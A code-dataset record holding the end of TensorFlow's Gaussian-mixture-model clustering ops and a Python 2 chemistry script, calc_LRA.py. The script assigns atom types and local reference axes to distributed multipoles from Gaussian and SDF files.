diag_m = array_ops.transpose(math_ops.reduce_sum(x_mu_cov, 1))
self._probs[shard_id] = -0.5 * (diag_m + math_ops.to_float(self._dimensions)
* math_ops.log(2 * np.pi) + log_det_covs)
def _define_diag_covariance_probs(self, shard_id, shard):
"""Defines the diagonal covariance probabilities per example in a class.
Args:
shard_id: id of the current shard.
shard: current data shard, 1 X num_examples X dimensions.
Updates a matrix with dimension num_examples X num_classes.
"""
# num_classes X 1
# TODO(xavigonzalvo): look into alternatives to log for
# reparametrization of variance parameters.
det_expanded = math_ops.reduce_sum(
math_ops.log(self._covs + 1e-3), 1, keep_dims=True)
diff = shard - self._means
x2 = math_ops.square(diff)
cov_expanded = array_ops.expand_dims(1.0 / (self._covs + 1e-3), 2)
# num_classes X num_examples
x2_cov = math_ops.matmul(x2, cov_expanded)
x2_cov = array_ops.transpose(array_ops.squeeze(x2_cov, [2]))
self._probs[shard_id] = -0.5 * (
math_ops.to_float(self._dimensions) * math_ops.log(2.0 * np.pi) +
array_ops.transpose(det_expanded) + x2_cov)
def _define_log_prob_operation(self, shard_id, shard):
"""Probability per example in a class.
Updates a matrix with dimension num_examples X num_classes.
Args:
shard_id: id of the current shard.
shard: current data shard, 1 X num_examples X dimensions.
"""
# TODO(xavigonzalvo): Use the pdf defined in
# third_party/tensorflow/contrib/distributions/python/ops/gaussian.py
if self._covariance_type == FULL_COVARIANCE:
self._define_full_covariance_probs(shard_id, shard)
elif self._covariance_type == DIAG_COVARIANCE:
self._define_diag_covariance_probs(shard_id, shard)
self._probs[shard_id] += math_ops.log(self._alpha)
def _define_prior_log_prob_operation(self, shard_id):
"""Computes the prior probability of all samples.
Updates a vector where each item is the prior probability of an
input example.
Args:
shard_id: id of current shard_id.
"""
self._prior_probs[shard_id] = math_ops.reduce_logsumexp(
self._probs[shard_id], axis=1, keep_dims=True)
def _define_expectation_operation(self, shard_id):
# Shape broadcasting.
probs = array_ops.expand_dims(self._probs[shard_id], 0)
# Membership weights are computed as:
# w_{ik} = \frac{\alpha_k f(\mathbf{y_i}|\mathbf{\theta}_k)}
# {\sum_{m=1}^{K}\alpha_mf(\mathbf{y_i}|\mathbf{\theta}_m)}
# where "i" is the i-th example, "k" is the k-th mixture, theta are
# the model parameters and y_i the observations.
# These are defined for each shard.
self._w[shard_id] = array_ops.reshape(
math_ops.exp(probs - self._prior_probs[shard_id]),
array_ops.stack([self._num_examples, self._num_classes]))
def _define_partial_maximization_operation(self, shard_id, shard):
"""Computes the partial statistics of the means and covariances.
Args:
shard_id: current shard id.
shard: current data shard, 1 X num_examples X dimensions.
"""
# Soft assignment of each data point to each of the two clusters.
self._points_in_k[shard_id] = math_ops.reduce_sum(
self._w[shard_id], 0, keep_dims=True)
# Partial means.
w_mul_x = array_ops.expand_dims(
math_ops.matmul(
self._w[shard_id], array_ops.squeeze(shard, [0]), transpose_a=True),
1)
self._w_mul_x.append(w_mul_x)
# Partial covariances.
x = array_ops.concat([shard for _ in range(self._num_classes)], 0)
x_trans = array_ops.transpose(x, perm=[0, 2, 1])
x_mul_w = array_ops.concat([
array_ops.expand_dims(x_trans[k, :, :] * self._w[shard_id][:, k], 0)
for k in range(self._num_classes)
], 0)
self._w_mul_x2.append(math_ops.matmul(x_mul_w, x))
def _define_maximization_operation(self, num_batches):
"""Maximization operations."""
# TODO(xavigonzalvo): some of these operations could be moved to C++.
# Compute the effective number of data points assigned to component k.
with ops.control_dependencies(self._w):
points_in_k = array_ops.squeeze(
math_ops.add_n(self._points_in_k), squeeze_dims=[0])
# Update alpha.
if 'w' in self._params:
final_points_in_k = points_in_k / num_batches
num_examples = math_ops.to_float(math_ops.reduce_sum(final_points_in_k))
self._alpha_op = self._alpha.assign(final_points_in_k /
(num_examples + MEPS))
else:
self._alpha_op = control_flow_ops.no_op()
self._train_ops = [self._alpha_op]
# Update means.
points_in_k_expanded = array_ops.reshape(points_in_k,
[self._num_classes, 1, 1])
if 'm' in self._params:
self._means_op = self._means.assign(
math_ops.div(
math_ops.add_n(self._w_mul_x), points_in_k_expanded + MEPS))
else:
self._means_op = control_flow_ops.no_op()
# means are (num_classes x 1 x dims)
# Update covariances.
with ops.control_dependencies([self._means_op]):
b = math_ops.add_n(self._w_mul_x2) / (points_in_k_expanded + MEPS)
new_covs = []
for k in range(self._num_classes):
mean = self._means.value()[k, :, :]
square_mean = math_ops.matmul(mean, mean, transpose_a=True)
new_cov = b[k, :, :] - square_mean + self._min_var
if self._covariance_type == FULL_COVARIANCE:
new_covs.append(array_ops.expand_dims(new_cov, 0))
elif self._covariance_type == DIAG_COVARIANCE:
new_covs.append(
array_ops.expand_dims(array_ops.diag_part(new_cov), 0))
new_covs = array_ops.concat(new_covs, 0)
if 'c' in self._params:
# Train operations don't need to take care of the means
# because covariances already depend on it.
with ops.control_dependencies([self._means_op, new_covs]):
self._train_ops.append(
state_ops.assign(
self._covs, new_covs, validate_shape=False))
def _define_distance_to_clusters(self, data):
"""Defines the Mahalanobis distance to the assigned Gaussian."""
# TODO(xavigonzalvo): reuse (input - mean) * cov^-1 * (input -
# mean) from log probability function.
self._all_scores = []
for shard in data:
all_scores = []
shard = array_ops.expand_dims(shard, 0)
for c in xrange(self._num_classes):
if self._covariance_type == FULL_COVARIANCE:
cov = self._covs[c, :, :]
elif self._covariance_type == DIAG_COVARIANCE:
cov = array_ops.diag(self._covs[c, :])
inverse = linalg_ops.matrix_inverse(cov + self._min_var)
inv_cov = array_ops.tile(
array_ops.expand_dims(inverse, 0),
array_ops.stack([self._num_examples, 1, 1]))
diff = array_ops.transpose(shard - self._means[c, :, :], perm=[1, 0, 2])
m_left = math_ops.matmul(diff, inv_cov)
all_scores.append(
math_ops.sqrt(
math_ops.matmul(
m_left, array_ops.transpose(
diff, perm=[0, 2, 1]))))
self._all_scores.append(
array_ops.reshape(
array_ops.concat(all_scores, 1),
array_ops.stack([self._num_examples, self._num_classes])))
# Distance to the associated class.
self._all_scores = array_ops.concat(self._all_scores, 0)
assignments = array_ops.concat(self.assignments(), 0)
rows = math_ops.to_int64(math_ops.range(0, self._num_examples))
indices = array_ops.concat(
[array_ops.expand_dims(rows, 1), array_ops.expand_dims(assignments, 1)],
1)
self._scores = array_ops.gather_nd(self._all_scores, indices)
def _define_loglikelihood_operation(self):
"""Defines the total log-likelihood of current iteration."""
self._ll_op = []
for prior_probs in self._prior_probs:
self._ll_op.append(math_ops.reduce_sum(math_ops.log(prior_probs)))
summary.scalar('ll', math_ops.reduce_sum(self._ll_op))
def gmm(inp,
initial_clusters,
num_clusters,
random_seed,
covariance_type=FULL_COVARIANCE,
params='wmc'):
"""Creates the graph for Gaussian mixture model (GMM) clustering.
Args:
inp: An input tensor or list of input tensors
initial_clusters: Specifies the clusters used during
initialization. Can be a tensor or numpy array, or a function
that generates the clusters. Can also be "random" to specify
that clusters should be chosen randomly from input data. Note: the
accepted types are varied to stay consistent with skflow.
num_clusters: number of clusters.
random_seed: Python integer. Seed for PRNG used to initialize centers.
covariance_type: one of "diag", "full".
params: Controls which parameters are updated in the training
process. Can contain any combination of "w" for weights, "m" for
means, and "c" for covars.
Returns:
Note: tuple of lists returned to be consistent with skflow
A tuple consisting of:
all_scores: A matrix (or list of matrices) of dimensions (num_input,
num_clusters) where the value is the distance of an input vector and a
cluster center.
assignments: A vector (or list of vectors). Each element in the vector
corresponds to an input row in 'inp' and specifies the cluster id
corresponding to the input.
scores: Similar to assignments but specifies the distance to the
assigned cluster instead.
training_op: an op that runs an iteration of training.
init_op: an op that runs the initialization.
"""
initial_means = None
if initial_clusters != 'random' and not isinstance(initial_clusters,
ops.Tensor):
initial_means = constant_op.constant(initial_clusters, dtype=dtypes.float32)
# Implementation of GMM.
inp = inp if isinstance(inp, list) else [inp]
gmm_tool = GmmAlgorithm(inp, num_clusters, initial_means, params,
covariance_type, random_seed)
assignments = gmm_tool.assignments()
all_scores, scores = gmm_tool.scores()
return ([all_scores], [assignments], [scores], gmm_tool.training_ops(),
gmm_tool.init_ops(), gmm_tool.is_initialized())
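if __name__ == '__main__':
  # Minimal smoke test (an illustrative sketch added to this listing, not part
  # of the original module): build the GMM graph on synthetic 2-D data and run
  # a few EM iterations in a TF1-style session.
  from tensorflow.python.client import session as session_lib
  np.random.seed(0)
  points = np.random.randn(200, 2).astype(np.float32)
  inp = constant_op.constant(points)
  _, assignments, _, train_op, init_op, _ = gmm(
      inp, 'random', num_clusters=3, random_seed=42)
  with session_lib.Session() as sess:
    sess.run(variables.global_variables_initializer())
    sess.run(init_op)
    for _ in xrange(5):
      sess.run(train_op)
    print('first cluster ids:', sess.run(assignments[0][0])[:10])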
|
xuleiboy1234/autoTitle
|
tensorflow/tensorflow/contrib/factorization/python/ops/gmm_ops.py
|
Python
|
mit
| 22,026
|
[
"Gaussian"
] |
738cd22d3a37ae3bd1997cb52dc0797e94892f548de962a785dd2bfcd7e0db14
|
#!/usr/bin/env python
#
# Copyright 2013 Tristan Bereau and Christian Kramer
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
####################
#
# This program generates a .pun file with the local reference axis system assigned for each atom
def distribute_charge(atom,chrg):
"""Identifies groups of atoms connected by pi systems
and distributes charge assignment among these."""
global checked
global hbrdz
global dchrg
neighbors = atom.GetNeighbors()
for at in neighbors:
if checked[at.GetIdx()] == False and (hbrdz[at.GetIdx()] in ['SP2','SP']):
checked[at.GetIdx()] = True
dchrg[at.GetIdx()] += chrg
distribute_charge(at,chrg)
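# Added illustration (not part of the original script): the same flood fill
# over a plain adjacency list, without the RDKit objects or module globals.
# All names here are hypothetical.
def _spread_charge(adj, hyb, start, chrg, dchrg, seen):
    """Depth-first walk over conjugated (SP/SP2) neighbours, adding chrg."""
    for nb in adj[start]:
        if not seen[nb] and hyb[nb] in ('SP2', 'SP'):
            seen[nb] = True
            dchrg[nb] += chrg
            _spread_charge(adj, hyb, nb, chrg, dchrg, seen)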
import sys
###########
# Set defaults
basename = ''
pun = True
boxp = False
bondcheck = True
punxyz = False
###########
# Read Input
for i in range(len(sys.argv)):
if sys.argv[i] == '-in':
basename = sys.argv[i+1]
elif sys.argv[i] == '-lpun':
pun = False
elif sys.argv[i] == '-boxp':
boxp = True
elif sys.argv[i] == '-nobondcheck':
bondcheck = False
elif sys.argv[i] == '-punxyz':
punxyz = True
elif sys.argv[i] == '-h':
print "Usage: python calc_LRA.py -in [base filename] [-lpun] [-boxp] [-punxyz] [-nobondcheck] [-h]"
print "(Base filename might also end on {.sdf, .log, .pun, .out})"
exit(0)
if basename == '':
print "Could not recognize file basename."
print "Usage: python calc_LRA.py -in [base filename] [-lpun] [-boxp] [-punxyz] [-nobondcheck] [-h]"
print "(Base filename might also end on {.sdf, .log, .pun, .out})"
exit(0)
import copy, os, string
import rdkit
from rdkit import Chem
if basename[-4:] in ['.sdf','.log','.pun','.out']: basename = basename[:-4]
##############
# Get coordinates from the Gaussian output file or the punfile.
# The Gaussian output file is expected to end in .log.
# If no Gaussian output file ending in .log is found, one ending in .out is
# searched for. If neither is found, the program exits.
if punxyz == True:
import mtp_tools, numpy
mo = mtp_tools.molecule()
mo.readfromrawpunfile(basename+'.pun')
xyzblock = []
for atom in mo.atoms: xyzblock.append([atom.atype, float(atom.coords[0]), float(atom.coords[1]), float(atom.coords[2])])
else:
outfiles = []
outfile = ''
if os.path.exists(basename+'.log'):
outfiles.append(basename+'.log')
elif os.path.exists(basename+'.out'):
outfiles.append(basename+'.out')
for fi in outfiles:
f = open(fi,'r')
lines = f.readlines()
for line in lines:
if " Entering Gaussian System" in line:
outfile = fi
f.close()
if outfile == '':
print "Cannot find Gaussian output file", \
basename+".log or",basename+'.out.'
print "Program exiting"
exit(0)
f = open(outfile,'r')
gin = f.readlines()
f.close()
# This extracts the bonding block (unless the molecule is super super large)
gin = gin [-400:-6]
for i in range(len(gin)):
if 'l9999.exe' in gin[i]: break
if i == len(gin):
print "Have not been able to extract the bonding block from the Gaussian output file for ",basename
print "Exiting"
exit(0)
gin = gin[i+1:]
xyzblock = ''
for line in gin: xyzblock = xyzblock+line.strip()
xyzblock = xyzblock.split('\\')
for i in range(len(xyzblock)):
xyzblock[i] = xyzblock[i].replace(' ','')
for i in range(len(xyzblock)):
if xyzblock[i][0:7] == "Version": break
xyzblock = xyzblock[16:i-1]
for i in range(len(xyzblock)):
xyzblock[i] = xyzblock[i].split(',')
lenblock = len(xyzblock[i])
xyzblock[i][1] = float(xyzblock[i][lenblock-3])
xyzblock[i][2] = float(xyzblock[i][lenblock-2])
xyzblock[i][3] = float(xyzblock[i][lenblock-1])
##########
# Read .sd File & update H-bond information if necessary
f = open(basename+'.sdf','r')
orig_sdf = f.readlines()
f.close()
natoms = int(orig_sdf[3][0:3])
nbonds = int(orig_sdf[3][3:6])
bonds = orig_sdf[4+natoms:4+natoms+nbonds]
fchrg = [0]*natoms
if orig_sdf[4+natoms+nbonds][0:6] == 'M CHG':
chrg_line = orig_sdf[4+natoms+nbonds].split()
for i in range((len(orig_sdf[4+natoms+nbonds].split())-3)/2): fchrg[int(chrg_line[3+2*i])-1] = int(chrg_line[4+2*i])
if len(xyzblock) <> natoms:
print "Number of atoms in the original SD-File and the Gaussian output file are different for ",basename
print "LRA-assignment stopped."
print len(xyzblock),natoms
exit(1)
for i in range(len(xyzblock)):
if xyzblock[i][0] == 'H':
# find closest atom
dist = 100
closest_atom = i
for j in range(len(xyzblock)):
if j == i: continue
d = (xyzblock[i][1]-xyzblock[j][1])**2+(xyzblock[i][2]-xyzblock[j][2])**2+(xyzblock[i][3]-xyzblock[j][3])**2
if d < dist:
dist = d
closest_atom = j+1
# check whether closest atom is bond partner and replace information if necessary
for j in range(len(bonds)):
if int(bonds[j][0:3]) == i+1:
if int(bonds[j][3:6]) == closest_atom:
break
else:
previous_partner = int(bonds[j][3:6])
print 'SD-update in',basename,': Bond between ',i+1,'and',previous_partner,'replaced by bond between',i+1,'and',closest_atom
a = bonds[j][0:5]+str(closest_atom)+bonds[j][6:]
if closest_atom > 9: a = bonds[j][0:4]+str(closest_atom)+bonds[j][6:]
if closest_atom > 99: a = bonds[j][0:3]+str(closest_atom)+bonds[j][6:]
bonds[j] = a
fchrg[previous_partner-1] -= 1
fchrg[closest_atom-1] += 1
break
if int(bonds[j][3:6]) == i+1:
if int(bonds[j][0:3]) == closest_atom:
break
else:
previous_partner = int(bonds[j][0:3])
print 'SD-update in',basename,': Bond between ',i+1,'and',previous_partner,'replaced by bond between',i+1,'and',closest_atom
a = '  '+str(closest_atom)+bonds[j][3:]
if closest_atom > 9: a = ' '+str(closest_atom)+bonds[j][3:]
if closest_atom > 99: a = str(closest_atom)+bonds[j][3:]
bonds[j] = a
fchrg[previous_partner-1] -= 1
fchrg[closest_atom-1] += 1
break
## Write updated SD-File to output
# f = open(basename+'_n.sdf','w')
# for i in range(4): f.write(orig_sdf[i])
#
# for i in range(natoms):
# astring = '%10.4f'%xyzblock[i][1]
# astring = astring + '%10.4f'%xyzblock[i][2]
# astring = astring + '%10.4f'%xyzblock[i][3]
# astring = astring + orig_sdf[4+i][30:33]
# f.write(astring)
#
# for i in range(nbonds): f.write(bonds[i])
#
# if natoms-charge.count(0) > 0:
# chargeline = 'M CHG '+str(natoms-charge.count(0))
# for i in range(len(charge)):
# if charge[i] <> 0: chargeline = chargeline+' '+str(i)+' '+str(charge[i])
# chargeline = chargeline+'\n'
# f.write(chargeline)
#
# for i in range(len(orig_sdf)-5-natoms-nbonds): f.write(orig_sdf[5+natoms+nbonds+i])
#
# f.close()
###########
# Read .sd File using RDKit
try:
mol = Chem.MolFromMolFile(basename+'.sdf',removeHs=False)
except:
print 'Cannot read SD File ',basename,'.sdf properly. Program exiting.'
exit(0)
if natoms < 2:
print "Problem with ",basename
print "Currently only molecules with 2 or more atoms can be handled. Exiting"
exit(0)
###########
# Atom type each atom
atypes = [''] * natoms
atoms = mol.GetAtoms()
hbrdz = []
for atom in atoms: hbrdz.append(str(atom.GetHybridization()).split('.')[-1])
##########
# Get neighbours and second neighbours, assign terminal atoms
neighbour_atoms = [[]]*natoms
for bond in bonds:
bpartners = [bond[0:3],bond[3:6]]
neighbour_atoms[int(bpartners[0])-1] = neighbour_atoms[int(bpartners[0])-1]+[int(bpartners[1])-1]
neighbour_atoms[int(bpartners[1])-1] = neighbour_atoms[int(bpartners[1])-1]+[int(bpartners[0])-1]
terminal = [False]*natoms
for i in range(natoms):
if len(neighbour_atoms[i]) == 1:
terminal[i] = True
# Terminal atoms bonded to SP-hybridized atoms are not assigned SP hybridization in RDKit, so this has to be added here
if hbrdz[neighbour_atoms[i][0]] == 'SP': hbrdz[i] = 'SP'
nextneighbours = [[]]*natoms
for i,j in enumerate(terminal):
if j == True:
nextneighbours[i] = copy.copy(neighbour_atoms[neighbour_atoms[i][0]])
nextneighbours[i].remove(i)
##########
# Atom type Amides and aromatics (the others as well, but this is removed later on)
smartsf = open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'essential_atom_types.txt'), 'r')
etypes = []
lines = smartsf.readlines()
for line in lines:
if line[0] == '#': continue
line = line.split()
if len(line) < 2: continue
etypes.append(dict(type=line[0],smarts=line[1],molsmarts=Chem.MolFromSmarts(line[1])))
smartsf.close()
atypes = [''] * natoms
priorities = [0] * natoms
for i,tp in enumerate(etypes):
for at in mol.GetSubstructMatches(tp["molsmarts"],uniquify=False):
if atypes[at[0]] == '':
atypes[at[0]] = tp["type"]
priorities[at[0]] = i
############
# Finish Atom typing and assignment of priorities
for i in range(natoms):
if atypes[i][0] in ['C','N','O','P','S'] and atypes[i][1:] not in ['ar','am','l']: atypes[i] = atypes[i][0]+str(len(neighbour_atoms[i]))
for i,tp in enumerate(etypes):
for j in range(natoms):
if atypes[j] == tp["type"]: priorities[j] = i
############
# Add charges and distribute them across conjugated systems.
# This is done based on the old SD File (before Gaussian), naively
# assuming that Conjugation does not change during optimization.
#
# 1: Calculate formal charge on each atom
# 2: Calculate hybridization type on each atom (Hs will be unspecified)
# 3: Distribute charge to all conjugated atoms (i.e. atoms which are
# connected through a network of non-sp3 hybridization)
dchrg = copy.copy(fchrg)
for i,atom in enumerate(atoms):
checked = [False] * natoms
checked[i] = True
if fchrg[i] <> 0 and (hbrdz[i] in ['SP2','SP']):
distribute_charge(atom,fchrg[i])
for i in range(len(dchrg)):
if dchrg[i] > 0:
atypes[i] = atypes[i] + dchrg[i]*'+'
elif dchrg[i] < 0:
atypes[i] = atypes[i] + (-1)*dchrg[i]*'-'
# Initialize lin assignment (in case SP search below fails.)
# If we have a diatomic molecule, use the lin atom type
lin = [False]*natoms
if natoms == 2:
lin = [True]*natoms
# Special treatment for SP-hybridised Atoms: go along the chain until the end is reached (terminal = True)
# or Non SP-hybridised atoms are found
#
# SP atoms are assigned terminal reference spheres by default
SP_name_atoms = ['']*natoms
SP_neighbour_atoms = ['']*natoms
SP_nextneighbours = ['']*natoms
for i in range(natoms):
if hbrdz[i] <> 'SP': continue
if lin[i]: continue
if terminal[i] == True:
a = copy.copy(neighbour_atoms[i][0])
SP_name_atoms[i] = [a,nextneighbours[i][0]]
SP_neighbour_atoms[i] = copy.copy([a])
excl_list = [i,a]
while True:
b = copy.copy(neighbour_atoms[a])
for j in b:
if j in excl_list: b.remove(j)
if b == []:
lin[i] = True
break
if hbrdz[b[0]] == 'SP':
excl_list.append(b[0])
a = b[0]
continue
else:
break
if lin[i]: continue
SP_nextneighbours[i] = copy.copy(neighbour_atoms[b[0]])
for j in SP_nextneighbours[i]:
if j in excl_list: SP_nextneighbours[i].remove(j)
else:
a1 = copy.copy(neighbour_atoms[i][0])
a2 = copy.copy(neighbour_atoms[i][1])
if priorities[a1] < priorities[a2]:
SP_name_atoms[i] = [a1,a2]
else:
SP_name_atoms[i] = [a2,a1]
def_found = False
excl_list = [i,a1,a2]
a = a1
while True:
if terminal[a] == True:
break
elif hbrdz[a] <> 'SP':
def_found = True
SP_neighbour_atoms[i] = copy.copy([a])
SP_nextneighbours[i] = copy.copy(neighbour_atoms[a])
for j in SP_nextneighbours[i]:
if j in excl_list: SP_nextneighbours[i].remove(j)
break
else:
a = copy.copy(neighbour_atoms[a])
for j in a:
if j in excl_list: a.remove(j)
if a == []:
lin[i] = True
break
else:
a = a[0]
excl_list.append(a)
a = a2
while True:
if def_found == True: break
if terminal[a] == True:
# Tag atom as lin
lin[i] = True
break
elif hbrdz[a] <> 'SP':
def_found = True
SP_neighbour_atoms[i] = copy.copy([a])
SP_nextneighbours[i] = copy.copy(neighbour_atoms[a])
for j in SP_nextneighbours[i]:
if j in excl_list: SP_nextneighbours[i].remove(j)
break
else:
a = copy.copy(neighbour_atoms[a])
for j in a:
if j in excl_list: a.remove(j)
if a == []:
lin[i] = True
break
else:
a = a[0]
excl_list.append(a)
for i in range(natoms):
if hbrdz[i] == 'SP' and not lin[i]:
terminal[i] = True
neighbour_atoms[i] = SP_neighbour_atoms[i]
nextneighbours[i] = SP_nextneighbours[i]
###########
# Adjust priorities for charge: Priorities: negative charge > 0 > positive charge
if max(dchrg) > 10 or min(dchrg) < (-10):
print "Absolute distributed charges have become very large."
print " Please check your molecule"
exit(0)
for i in range(len(dchrg)):
priorities[i] = priorities[i] + dchrg[i] * 0.01
###########
# Initialize c3v assignment
c3v = [False]*natoms
###########
# Sort nearest neighbors according to priority and assign reference atoms by idx for each atom
priorised_neighbours = ['']*natoms
for i in range(natoms):
if terminal[i] == False:
neighbour_priorities = []
for neighbour in neighbour_atoms[i]: neighbour_priorities.append(priorities[neighbour])
prio_count = []
for j in neighbour_priorities: prio_count.append(neighbour_priorities.count(j))
# 'lin' type. Non-terminal can be defined by two atoms.
if lin[i]:
pri_neigh = []
for j in range(min(2,len(neighbour_atoms[i]))):
pri_neigh.append(neighbour_atoms[i][j])
priorised_neighbours[i] = pri_neigh
# Three neighbour atoms of the same kind
elif max(prio_count) == 3:
c3v[i] = True
pri_neigh = []
for j,count in enumerate(prio_count):
if count == 3: pri_neigh.append(neighbour_atoms[i][j])
for j,count in enumerate(prio_count):
if count == 1: pri_neigh.append(neighbour_atoms[i][j])
priorised_neighbours[i] = pri_neigh
# Two * two neighbour atoms of the same kind
elif max(prio_count) == 2 and min(prio_count) == 2 and len(prio_count) == 4:
pri_neigh = []
a = min(neighbour_priorities)
for j,prio in enumerate(neighbour_priorities):
if prio == a: pri_neigh.append(neighbour_atoms[i][j])
for j,prio in enumerate(neighbour_priorities):
if prio <> a: pri_neigh.append(neighbour_atoms[i][j])
priorised_neighbours[i] = pri_neigh
# Two neighbour atoms overall, both of the same kind
elif max(prio_count) == 2 and len(prio_count) == 2:
priorised_neighbours[i] = [neighbour_atoms[i][0],neighbour_atoms[i][1]]
# Three or four neighbour atoms with two of them of the same kind
elif max(prio_count) == 2 and min(prio_count) < 2:
pri_neigh = []
for j,count in enumerate(prio_count):
if count == 2: pri_neigh.append(neighbour_atoms[i][j])
neighbour_priorities = [neighbour_priorities[j] for j,k in enumerate(prio_count) if k < 2]
rest_atoms = [neighbour_atoms[i][j] for j,k in enumerate(prio_count) if k < 2]
pri_neigh.append(rest_atoms[neighbour_priorities.index(min(neighbour_priorities))])
if len(neighbour_atoms[i]) == 4: pri_neigh.append(rest_atoms[neighbour_priorities.index(max(neighbour_priorities))])
priorised_neighbours[i] = pri_neigh
# All neighbour atoms different
else:
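    # Added note: the loop below is effectively a selection sort of the
    # neighbours by ascending priority, i.e.
    # sorted(neighbour_atoms[i], key=lambda a: priorities[a]).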
pri_neigh = []
next_atoms = list(neighbour_atoms[i])
while len(neighbour_priorities) > 0:
pri_neigh.append(next_atoms[neighbour_priorities.index(min(neighbour_priorities))])
del next_atoms[neighbour_priorities.index(min(neighbour_priorities))]
del neighbour_priorities[neighbour_priorities.index(min(neighbour_priorities))]
priorised_neighbours[i] = pri_neigh
for i,atom in enumerate(atoms):
if terminal[i] == True:
# The single nearest neighbour has the highest priority
pri_neigh = [neighbour_atoms[i][0]]
neighbour_priorities = []
for neighbour in nextneighbours[i]: neighbour_priorities.append(priorities[neighbour])
prio_count = []
for j in neighbour_priorities: prio_count.append(neighbour_priorities.count(j))
# 'lin' type. Terminal only defined by one neighbor.
if lin[i]:
priorised_neighbours[i] = pri_neigh
# Three second neighbour atoms of the same kind
elif max(prio_count) == 3:
pri_neigh.append(nextneighbours[i][0])
pri_neigh.append(nextneighbours[i][1])
pri_neigh.append(nextneighbours[i][2])
priorised_neighbours[i] = pri_neigh
# Two second neighbour atoms of the same kind and no other second neighbour atom
elif max(prio_count) == 2 and len(prio_count) == 2:
pri_neigh.append(nextneighbours[i][0])
pri_neigh.append(nextneighbours[i][1])
priorised_neighbours[i] = pri_neigh
# Two second neighbour atoms of the same kind and one more atom in the second sphere
elif max(prio_count) == 2 and len(prio_count) == 3:
for j,count in enumerate(prio_count):
if count == 2: pri_neigh.append(nextneighbours[i][j])
pri_neigh.append(nextneighbours[i][prio_count.index(1)])
priorised_neighbours[i] = pri_neigh
# All second neighbours of different kinds
else:
next_atoms = list(nextneighbours[i])
while len(neighbour_priorities) > 0:
pri_neigh.append(next_atoms[neighbour_priorities.index(min(neighbour_priorities))])
del next_atoms[neighbour_priorities.index(min(neighbour_priorities))]
del neighbour_priorities[neighbour_priorities.index(min(neighbour_priorities))]
priorised_neighbours[i] = pri_neigh
############
# Assemble Composite atomtype Names
com_atypes = []
for i in range(len(atypes)):
com_atype = atypes[i]
if hbrdz[i] <> 'SP':
for j in priorised_neighbours[i]:com_atype = com_atype + atypes[j]
else:
com_atype = com_atype + atypes[SP_name_atoms[i][0]] + atypes[SP_name_atoms[i][1]]
com_atypes.append(com_atype)
###########
# Write output file
if pun == True:
f = open(basename+'.pun','r')
ol_punf = f.readlines()
f.close()
f = open(basename+'_l.pun','w')
k=0
header = True
while k < len(ol_punf) and header:
line = ol_punf[k].split()
if len(line) >= 6 and line[4] == "Rank" \
and line[0] not in ['#','!']:
header = False
k += 1
for i in range(k-1): f.write(ol_punf[i])
for i in range(len(atoms)):
line = ol_punf[k-1][2:]
line = com_atypes[i]+line
f.write(line)
line = line.split()
rnk = line[-1]
if rnk == '0':
for j in range(1): f.write(ol_punf[k+j])
k = k + 3
elif rnk == '2':
for j in range(3): f.write(ol_punf[k+j])
k = k + 5
else:
print "Error. Rank not supported ("+rnk+"). Exiting"
print line
exit(1)
f.write('\n')
f.write('LRA:\n')
for i in range(len(atoms)):
if lin[i]:
f.write('lin')
elif terminal[i] == True:
f.write('ter')
elif c3v[i] == True:
f.write('c3v')
else:
f.write('int')
for j in priorised_neighbours[i]: f.write(' '+str(j+1))
f.write('\n')
f.write('\n')
f.close()
if pun == False:
import mtp_tools, math, numpy
mo = mtp_tools.molecule()
mo.readfromrawpunfile(basename+'.pun')
for i in range(natoms):
mo.atoms[i].refkind = 'int'
if terminal[i] == True: mo.atoms[i].refkind = 'ter'
if c3v[i] == True: mo.atoms[i].refkind = 'c3v'
for j in range(len(priorised_neighbours[i])): mo.atoms[i].refatms.append(priorised_neighbours[i][j]+1)
mo.Calc_locMTP()
# Check bondlengths
if bondcheck == True:
for i in range(len(mo.atoms)):
if mo.atoms[i].refkind <> 'ter':
for j in range(len(mo.atoms[i].refatms)):
vect = mo.atoms[i].coords - mo.atoms[mo.atoms[i].refatms[j]-1].coords
dist = numpy.dot(vect,vect)
# 5.3 corresponds to 2.3 Angstroems (C-I bonds often have 2.1 Angstroems, it is annoying to see these in the warnings)
if dist > 5.3:
print 'Bondlength warning for molecule:',basename
print 'Distance between atom',str(i+1),'(',atypes[i],') and its reference atom',str(mo.atoms[i].refatms[j]),'(',atypes[mo.atoms[i].refatms[j]-1],') is',str(math.sqrt(dist)),'Angstroem'
print
f = open(basename+'.lpun','w')
f.write("! "+basename+"; Distributed multipoles rotated to local reference axis system.\n")
f.write("! Multipoles were obtained from "+basename+".pun. File was written by calc_lra.py.\n")
g = open(basename+'.pun','r')
for i in range(2): wrd = g.readline()
g.close()
f.write(wrd+'\n')
for i in range(len(atoms)):
f.write(com_atypes[i]+' '+str(i+1))
for j in range(3): f.write(' '+str(mo.atoms[i].coords[j]))
if boxp == False:
f.write(' Rank '+str(mo.atoms[i].rank)+'\n')
elif len(neighbour_atoms[i]) == 3 and terminal[i] == False:
# Calculate the box product as a scaling factor for the dipoles on internal pyramidal nitrogens
AC = mo.atoms[i].coords
RC0 = mo.atoms[mo.atoms[i].refatms[0]-1].coords
RC1 = mo.atoms[mo.atoms[i].refatms[1]-1].coords
RC2 = mo.atoms[mo.atoms[i].refatms[2]-1].coords
R0 = (RC0-AC)/math.sqrt(numpy.dot((RC0-AC),(RC0-AC).conj()))
R1 = (RC1-AC)/math.sqrt(numpy.dot((RC1-AC),(RC1-AC).conj()))
R2 = (RC2-AC)/math.sqrt(numpy.dot((RC2-AC),(RC2-AC).conj()))
# use a distinct name so the boxp option flag is not clobbered
boxprod = numpy.dot(R0,numpy.cross(R1,R2))
f.write(' Rank '+str(mo.atoms[i].rank)+' '+str(boxprod)+'\n')
else:
f.write(' Rank '+str(mo.atoms[i].rank)+'\n')
f.write('LRA: '+mo.atoms[i].refkind)
for j in mo.atoms[i].refatms: f.write(' '+str(j))
f.write('\n')
f.write(str(float(mo.atoms[i].chrg))+'\n')
for j in mo.atoms[i].dloc: f.write(str(j)+' ')
f.write('\n')
for j in mo.atoms[i].Qloc: f.write(str(j)+' ')
f.write('\n\n')
f.close()
|
MMunibas/FittingWizard
|
scripts/calc_LRA.py
|
